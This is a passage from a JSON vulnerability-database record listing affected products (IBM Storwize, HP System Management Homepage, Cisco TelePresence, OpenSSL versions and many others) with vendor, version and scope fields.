"vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "flex system p460 compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-42x)0" }, { "model": "content analysis system", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "1.1" }, { "model": "enterprise", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.1" }, { "model": "initiate master data service patient hub", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.1.0.5" }, { "model": "expressway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.5" }, { "model": "bladecenter t advanced management module 32r0835", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "57100" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.801" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.2" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.10" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.2" }, { "model": "flex system manager node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8734-" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.3.0.5" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.20" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.11" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.2" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.0.820" }, { "model": "systems insight manager sp2", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "datapower gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.0.12" }, { "model": "sparc enterprise m9000 xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1118" }, { "model": "datapower gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.3" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.2.0.3" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.3" }, { "model": "mobile wireless transport manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli workload scheduler distributed fp07", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.2" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.6" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.1" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "mate design", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "infosphere master data management", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "11.0" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x24078630" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.61" }, { "model": "hp-ux b.11.31", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.4.143" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "business process manager advanced", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x375087330" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "810.20" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x24089560" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.90" }, { "model": "powervu d9190 conditional access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "780.02" }, { "model": "bladecenter js12 express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7998-60x)0" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.1" }, { "model": "project openssl 1.0.1j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "jboss enterprise application platform", "scope": "ne", "trust": 0.3, "vendor": "redhat", "version": "6.4" }, { "model": "project openssl f", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "bladecenter -t", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8730" }, { "model": "cloudbridge", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.4" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.4.1.8" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.2.0.3" }, { "model": "data ontap operating in 7-mode", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "tivoli workload scheduler for applications fp01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.3.132" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.1.0.7" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x353071600" }, { "model": "adaptive security appliance software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9.0(4.29)" }, { "model": "flashsystem 9840-ae1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "840" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.0" }, { "model": "mate live", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "netezza platform software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.12" }, { "model": "telepresence integrator c series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.3.0.5" }, { "model": "project openssl 1.0.1d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2.0-12" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "770.50" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "bladecenter -h", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7989" }, { "model": "mobile security suite mss", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0.1.104" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.1.0.6" }, { "model": "tivoli workload scheduler distributed fp05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.1.0.7" }, { "model": "nsm", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.20" }, { "model": "cognos controller if3", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.10" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "780.11" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.1.0.6" }, { "model": "flex system p24l compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.1.0" }, { "model": "bladecenter -ht", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8740" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2.0.860" }, { "model": "power system s812l", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "780.10" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.2" }, { "model": "flex system fabric en4093r 10gb scalable switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.4.0" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50006.1" }, { "model": "prime collaboration provisioning", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "pulse secure", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "5" }, { "model": "initiate master data service provider hub", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x375087180" }, { "model": "flex system manager node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8731-" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "datapower gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.0.11" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.5.146" }, { "model": "idataplex dx360 m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79130" }, { "model": "systems insight manager sp6", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.1.73" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "4" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "45000" }, { "model": "telepresence isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32410" }, { "model": "project openssl 0.9.8zc", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system m5 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x310054570" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.0" }, { "model": "infosphere master data management", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "11.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.5" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "783.01" }, { "model": "mac os", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x10.10.3" }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3104.1" }, { "model": "telepresence ex series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.1" }, { "model": "system idataplex dx360 m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x73230" }, { "model": "management center", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "1.1" }, { "model": "webex meetings for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2.0" }, { "model": "norman shark scada protection", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "4.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.3.1" }, { "model": "system m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x363073770" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "810.10" }, { "model": "flex system interconnect fabric", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.8.10.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.4" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1841" }, { "model": "sterling connect:direct for hp nonstop", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "netezza platform software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.3" }, { "model": "cognos controller fp1", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4" }, { "model": "tivoli workload scheduler for applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "virtual connect enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1" }, { "model": "project openssl 1.0.0h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50006.3" }, { "model": "adaptive security appliance software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9.2(3.1)" }, { "model": "netezza platform software 7.1.0.5-p3", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "(x86)4.4" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "initiate master data service", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.5" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.3" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "systems insight manager sp1", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.8.179" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "8" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "cms r16", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "junos os", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x355079140" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "770.20" }, { "model": "project openssl 0.9.8o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "netezza platform software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.16" }, { "model": "x-series xos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "9.6" }, { "model": "alienvault", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.15" }, { "model": "project openssl e", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl 1.0.1b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0k", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "810.01" }, { "model": "power systems 350.d0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "bladecenter -h", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1886" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x375087520" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "770.40" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.2" }, { "model": "vds service broker", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence conductor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "74.90" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "norman shark network protection", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "4.2" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "d9036 modular encoding platform", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "video surveillance 4300e/4500e high-definition ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.2.0.5" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.2" }, { "model": "director", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.1" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.40" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3950x638370" }, { "model": "flex system p260 compute node /fc efd9", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.0" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "6" }, { "model": "tivoli workload scheduler distributed fp01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.2.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50006.2" }, { "model": "app for vmware", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "0" }, { "model": "sparc enterprise m4000 xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1117" }, { "model": "power", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5950" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "junos os 12.3x48-d10", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "bladecenter -e", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8677" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.2" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10500" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0.5" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.5" }, { "model": "one-x client enablement services sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "malware analyzer g2", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "4.1" }, { "model": "system m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365054540" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "video surveillance ptz ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "anyconnect secure mobility client for ios", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "004.000(1233)" }, { "model": "project openssl 0.9.8s", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.2.835" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.2.10" }, { "model": "telepresence serial gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1.0.841" }, { "model": "sparc enterprise m8000", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "0" }, { "model": "tivoli workload scheduler distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.1.0.7" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.3" }, { "model": "sterling connect:direct for hp nonstop", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.6" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "ctpos 6.6r5", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "proxysg sgos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.2" }, { "model": "cloud", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "0" }, { "model": "webex meetings server 2.5mr2", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "junos os 13.2r8", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1.0.103" }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.3" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "780.01" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.9" }, { "model": "norman shark industrial control system protection", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.52" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1" }, { "model": "unified attendant console enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "power express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "550" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "netscaler service delivery appliance", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "system m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x350078390" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "management center", "scope": "ne", "trust": 0.3, "vendor": "bluecoat", "version": "1.3.2.1" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.22" }, { "model": "power express f/c", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5504965" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.2.7" }, { "model": "telepresence server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "87104.1" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "53000" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.3.0" }, { "model": "sparc enterprise m8000 xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1118" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "flex system fabric si4093 system interconnect module", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.60" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.0.121" }, { "model": "ios 15.5 s", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0.2" }, { "model": "prime performance manager for sps ppm sp1", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.6" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.1.0.7" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "telepresence mx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "session border controller for enterprise", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.0" }, { "model": "tivoli workload scheduler distributed fp04", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.4" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.7.770" }, { "model": "insight orchestration", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.70" }, { "model": "content analysis system", "scope": "ne", "trust": 0.3, "vendor": "bluecoat", "version": "1.2.3.1" }, { "model": 